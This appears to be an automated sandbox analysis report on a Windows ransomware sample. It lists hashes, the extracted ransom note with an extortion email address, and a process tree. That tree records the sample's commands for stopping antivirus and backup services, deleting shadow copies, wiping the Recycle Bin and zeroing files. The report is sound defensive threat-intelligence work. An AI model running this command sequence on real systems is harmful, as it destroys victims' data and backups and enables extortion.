Analysis
-
max time kernel
144s -
max time network
143s -
platform
windows10_x64 -
resource
win10 -
submitted
18-06-2020 02:08
General
-
Target
90a909a4508aa899b4be372e7de6f500.exe
-
Size
62KB
-
MD5
90a909a4508aa899b4be372e7de6f500
-
SHA1
7bb201923d7055c149858d087c0a44ab9530536e
-
SHA256
1c83ff2394da76e6296e6ad72c40dbde107704a711bbd08b633c57587230ccf8
-
SHA512
57b732ac3827878c81ed45e26001695c42240b6eb16d4c9d0ecd34d41ede0d598983c156a5c22c8a5f79e81437ed308e0414571cda1c0725ab7b2b3ef9f683cf
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\DEAL_FOR_ACCESS_TO_YOUR_FILES.txt
Ransom Note
*** WARNING ***
Important Files In This Machine Has LOCKED.
Your Files ONLY Can Recover By Special Unlocker.
Important And Private Documents Also COPIED.
After This Message Time For Payment Is Limited.
After Time Limit Next Payment Will Be x2
Next Step Is Publish Files And Document.
You Can Test 1 File (Max. 2MB) To Unlock
l1u1t1@secmail.pro
Key Identifier:
On5TrSwffaf8cdrYWygamPz+sRvUObZ84oiaI2t3MVfipXn+mgBPo1hizJfpCpOBm6Lany40ycuFkjhm4s0WebPgOzJTu/iY0l4UH/Csw/uv7Cr/MK2SRJeW4WHUBxpu/8lS2SzQ/67rSUPRtk8zlp43C9euJM5/SK/khT3kkrofhaUhqY01sHQLdNVwPzI9ohDM6dQuXv4wJLpTUa/Fl7RFRlLNLuAQfBUX1vg0543Y8QTuUuFDpUKozZes5jdah/U8tqz9uUy6pim1QhyluiH2Sx8RNRcuPddlH+SKnsqgY3JdYOQ1wwNf6PZQZQhqSx43vxPVMRZjKGb176AR4g==
Emails
l1u1t1@secmail.pro
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops startup file 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 3 IoCs
-
Opens file in notepad (likely ransom note) 2 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 4 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of SetWindowsHookEx 15 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\90a909a4508aa899b4be372e7de6f500.exe"C:\Users\Admin\AppData\Local\Temp\90a909a4508aa899b4be372e7de6f500.exe"1⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpEF13.bat2⤵
-
C:\Windows\SysWOW64\mountvol.exemountvol3⤵
-
C:\Windows\SysWOW64\find.exefind "}\"3⤵
-
C:\Windows\SysWOW64\mountvol.exemountvol !freedrive!: \\?\Volume{9563bb1f-0000-0000-0000-500600000000}\3⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\mountvol.exemountvol !freedrive!: \\?\Volume{9563bb1f-0000-0000-0000-100000000000}\3⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\mountvol.exemountvol !freedrive!: \\?\Volume{d61488bd-b008-11ea-95e4-806e6f6e6963}\3⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\DEAL_FOR_ACCESS_TO_YOUR_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\90a909a4508aa899b4be372e7de6f500.exe2⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\EnableFind.rtf" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\OptimizeRename.txt1⤵
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmpEF13.batMD5
1af2c796c268a8160d0d93e8866dc7b0
SHA16d786ee5bf9cb9b1da115ce6daffe1e7b5ef988f
SHA25694e31962442ee5f22c9ff8f6539c214dabf49e1b672a91cb042e2c0c1369abc8
SHA512af10c10ef2c7f976ebc52201d17c95cb2a5c433d39c7d722b0c1f56cb48fa27c07cf60e7de8c2d9974f6594212eb02568007da90e49ba3bca226efbe8943271e
-
C:\Users\Admin\AppData\Local\Temp\v.txtMD5
6904d06486a00b0c3633fb57180f663d
SHA15369899d14980ad49a183f3fee44631f806194c7
SHA25603bb07b5fcc7613ee9c4201647bbfab1dab2045a336813b349a2402f95b212bd
SHA5128e276de659c3209fcfdf369630b1a72c0d05fccb1406f7d28f5a2829d477a5ec0d17752e97b360964ab8a11be5bf10ce9a29f3a65c57f345291318dad2eadb30
-
C:\Users\Admin\Desktop\DEAL_FOR_ACCESS_TO_YOUR_FILES.txtMD5
6f394578305ee1978f73a0a13f021e7b
SHA13a8105811a3dc6bd29a9cbab4f9e1a1bfbec2215
SHA25670f2550ff11ddb0ed9264fbe81aff333d3b522bcf7a02b59b4b526a22deff240
SHA512a20f9c3ca19c73155b9de341b0533e4897737d597c93c2e9e7920e16bd1aefa79bc1bd8a3bd4a44ba779a43614058e26c1a48b3045c96f3a127f46d7d1c23bf6
-
C:\Users\Admin\Desktop\EnableFind.rtfMD5
c368cecdb79fc221ed59542a41c7b81a
SHA17d1d1d1d439fe4a98c28aa381ad9656600050b34
SHA256756935cfa1b55ec41420ebbe53fbcfe409c940a5709da858accf8413b3dc7e5e
SHA5122a953680fd645c13c372d501f3de89ed5cc74fe767f1d2d5f8ebdf488b54f909df51230d5a2dfc4f5251510ce261fe8daea71d931172d13871d92a0847f2c1fa
-
C:\Users\Admin\Desktop\OptimizeRename.txtMD5
cf29204f3383382863fdf280d4c808e3
SHA1f73494ba158692a2bee133a9ba949dfad53e852e
SHA256c8fd5624b181288feec1138608159210547e2353433ce577c7b2fe9919a03687
SHA512660821cacadfe75f290c9751dce5bc58ff646a28f879e441e273cdaf5801582cee8b2f1f0a08522de6f7fc12d3f2ab66c4b4c82a600cad7f1724becb03e923c6
-
C:\Users\Admin\Documents\Are.docxMD5
fc196d75b0bd76e30eaf622f6db78a9b
SHA1b1bb41b3d88382d86c040bcfd02fb19259236865
SHA2562ad99aee31977a66af3bfd49aa8cca533699255ff2c69f25379fc5ce89fa4b26
SHA5129436e5e4cbe4f5ac4d5587a688f9687cf2b93343a93538ecbc745b9829b510624ca683bcae67fc4bd3170b0096e65059cc9e7321e82bfb402a5bdc7a49a6fb0e
-
C:\Users\Admin\Documents\Files.docxMD5
c859cce4e08ffbda90de78b8484c97ff
SHA1e9c79f26816f0886038a2f7798b53c61ebe97fec
SHA256f8f601a72c9443c7348240bc64d0f2c4bbbcb64573a4c77b3059abbd80173e0d
SHA512516c4e959ba07ba4902a0e65026d5c60591535b08632036d305278f0760be1f56ab01ff7c89f19dbb599f6a46fa5423aa5044fd22aecb105972cdd8c2e586956
-
C:\Users\Admin\Documents\Opened.docxMD5
b95d7719f84df265d9053a793a93a5cd
SHA1bba9a53fa583ca228f958fdac1e40c5b14f34c48
SHA256ffaff0183082ea32765029694b94e89835654def5fb920aa7877cfc19e7b8fb3
SHA512cf8ced8c895a387ee13f9764269e112573a5a9a1b2792d234f386671ec9cc74b9154d2f0fa364327de438ff822364475dc7e5e20bbda0714db878cb2e8879ab7
-
C:\Users\Admin\Documents\Recently.docxMD5
0a6d2c367de8ce6419804527a9feb2e2
SHA18702944c041ec9cc871defe9f51fd353553a059c
SHA256d552bb2c9c1d3f8b8adb5b3d8d3396dad790da1ded93cf73a8c9337c93b1b18d
SHA512b21ba1e6311190404bd4672ee051102b44498dac7783d670da74c1798b89c5f96efa74a3ac932460f63d862382756c441d3cbe091902386fa2c49fc07749c184
-
C:\Users\Admin\Documents\These.docxMD5
c314ae79a45efd50edc459765a7a08fa
SHA1bc14d205e4e6fa0f49d3029a66279b3672eb2fb8
SHA256ba00a67665ec61c6fc084bfba4548a5281443178748194f26542db7f845dca5f
SHA51292a13c7d6223c46d09b6f640f39bfc9bc92328615366a078638747658558f5015213dc61205a52d5e3fa96f12e3eb3108fcf3967beb718176df9e3300a234245
-
memory/64-42-0x0000000000000000-mapping.dmp
-
memory/400-28-0x0000000000000000-mapping.dmp
-
memory/476-86-0x0000000000000000-mapping.dmp
-
memory/496-83-0x0000000000000000-mapping.dmp
-
memory/612-29-0x0000000000000000-mapping.dmp
-
memory/728-46-0x0000000000000000-mapping.dmp
-
memory/732-44-0x0000000000000000-mapping.dmp
-
memory/736-57-0x0000000000000000-mapping.dmp
-
memory/740-82-0x0000000000000000-mapping.dmp
-
memory/776-77-0x0000000000000000-mapping.dmp
-
memory/780-56-0x0000000000000000-mapping.dmp
-
memory/796-110-0x0000000000000000-mapping.dmp
-
memory/972-73-0x0000000000000000-mapping.dmp
-
memory/992-50-0x0000000000000000-mapping.dmp
-
memory/996-51-0x0000000000000000-mapping.dmp
-
memory/1188-109-0x0000000000000000-mapping.dmp
-
memory/1336-43-0x0000000000000000-mapping.dmp
-
memory/1656-41-0x0000000000000000-mapping.dmp
-
memory/1768-111-0x0000000000000000-mapping.dmp
-
memory/2000-96-0x0000000000000000-mapping.dmp
-
memory/2000-31-0x0000000000000000-mapping.dmp
-
memory/2044-58-0x0000000000000000-mapping.dmp
-
memory/2052-98-0x0000000000000000-mapping.dmp
-
memory/2052-45-0x0000000000000000-mapping.dmp
-
memory/2116-14-0x0000000000000000-mapping.dmp
-
memory/2288-70-0x0000000000000000-mapping.dmp
-
memory/2336-13-0x0000000000000000-mapping.dmp
-
memory/2344-100-0x0000000000000000-mapping.dmp
-
memory/2660-27-0x0000000000000000-mapping.dmp
-
memory/2668-8-0x0000000000000000-mapping.dmp
-
memory/2684-59-0x0000000000000000-mapping.dmp
-
memory/2684-99-0x0000000000000000-mapping.dmp
-
memory/2760-12-0x0000000000000000-mapping.dmp
-
memory/2888-32-0x0000000000000000-mapping.dmp
-
memory/2916-11-0x0000000000000000-mapping.dmp
-
memory/2916-101-0x0000000000000000-mapping.dmp
-
memory/2960-78-0x0000000000000000-mapping.dmp
-
memory/2976-72-0x0000000000000000-mapping.dmp
-
memory/2976-15-0x0000000000000000-mapping.dmp
-
memory/2980-30-0x0000000000000000-mapping.dmp
-
memory/3024-61-0x0000000000000000-mapping.dmp
-
memory/3024-74-0x0000000000000000-mapping.dmp
-
memory/3144-24-0x0000000000000000-mapping.dmp
-
memory/3264-25-0x0000000000000000-mapping.dmp
-
memory/3320-26-0x0000000000000000-mapping.dmp
-
memory/3376-52-0x0000000000000000-mapping.dmp
-
memory/3380-65-0x0000000000000000-mapping.dmp
-
memory/3380-9-0x0000000000000000-mapping.dmp
-
memory/3384-10-0x0000000000000000-mapping.dmp
-
memory/3388-40-0x0000000000000000-mapping.dmp
-
memory/3388-106-0x0000000000000000-mapping.dmp
-
memory/3392-67-0x0000000000000000-mapping.dmp
-
memory/3448-89-0x0000000000000000-mapping.dmp
-
memory/3520-0-0x0000000000000000-mapping.dmp
-
memory/3572-97-0x0000000000000000-mapping.dmp
-
memory/3572-33-0x0000000000000000-mapping.dmp
-
memory/3572-102-0x0000000000000000-mapping.dmp
-
memory/3572-47-0x0000000000000000-mapping.dmp
-
memory/3584-85-0x0000000000000000-mapping.dmp
-
memory/3588-68-0x0000000000000000-mapping.dmp
-
memory/3632-79-0x0000000000000000-mapping.dmp
-
memory/3640-69-0x0000000000000000-mapping.dmp
-
memory/3644-60-0x0000000000000000-mapping.dmp
-
memory/3648-48-0x0000000000000000-mapping.dmp
-
memory/3652-16-0x0000000000000000-mapping.dmp
-
memory/3764-93-0x0000000000000000-mapping.dmp
-
memory/3768-36-0x0000000000000000-mapping.dmp
-
memory/3772-54-0x0000000000000000-mapping.dmp
-
memory/3772-39-0x0000000000000000-mapping.dmp
-
memory/3776-75-0x0000000000000000-mapping.dmp
-
memory/3796-80-0x0000000000000000-mapping.dmp
-
memory/3800-22-0x0000000000000000-mapping.dmp
-
memory/3808-34-0x0000000000000000-mapping.dmp
-
memory/3812-18-0x0000000000000000-mapping.dmp
-
memory/3816-20-0x0000000000000000-mapping.dmp
-
memory/3820-84-0x0000000000000000-mapping.dmp
-
memory/3824-90-0x0000000000000000-mapping.dmp
-
memory/3828-3-0x0000000000000000-mapping.dmp
-
memory/3828-19-0x0000000000000000-mapping.dmp
-
memory/3828-35-0x0000000000000000-mapping.dmp
-
memory/3828-63-0x0000000000000000-mapping.dmp
-
memory/3832-76-0x0000000000000000-mapping.dmp
-
memory/3836-103-0x0000000000000000-mapping.dmp
-
memory/3840-17-0x0000000000000000-mapping.dmp
-
memory/3840-1-0x0000000000000000-mapping.dmp
-
memory/3856-62-0x0000000000000000-mapping.dmp
-
memory/3868-6-0x0000000000000000-mapping.dmp
-
memory/3872-4-0x0000000000000000-mapping.dmp
-
memory/3880-94-0x0000000000000000-mapping.dmp
-
memory/3884-21-0x0000000000000000-mapping.dmp
-
memory/3884-107-0x0000000000000000-mapping.dmp
-
memory/3884-64-0x0000000000000000-mapping.dmp
-
memory/3888-5-0x0000000000000000-mapping.dmp
-
memory/3908-71-0x0000000000000000-mapping.dmp
-
memory/3916-53-0x0000000000000000-mapping.dmp
-
memory/3916-66-0x0000000000000000-mapping.dmp
-
memory/3916-105-0x0000000000000000-mapping.dmp
-
memory/3924-88-0x0000000000000000-mapping.dmp
-
memory/3928-7-0x0000000000000000-mapping.dmp
-
memory/3928-91-0x0000000000000000-mapping.dmp
-
memory/3936-38-0x0000000000000000-mapping.dmp
-
memory/3936-23-0x0000000000000000-mapping.dmp
-
memory/3940-87-0x0000000000000000-mapping.dmp
-
memory/3944-37-0x0000000000000000-mapping.dmp
-
memory/3948-81-0x0000000000000000-mapping.dmp
-
memory/3984-2-0x0000000000000000-mapping.dmp
-
memory/4008-55-0x0000000000000000-mapping.dmp
-
memory/4008-92-0x0000000000000000-mapping.dmp
-
memory/4052-49-0x0000000000000000-mapping.dmp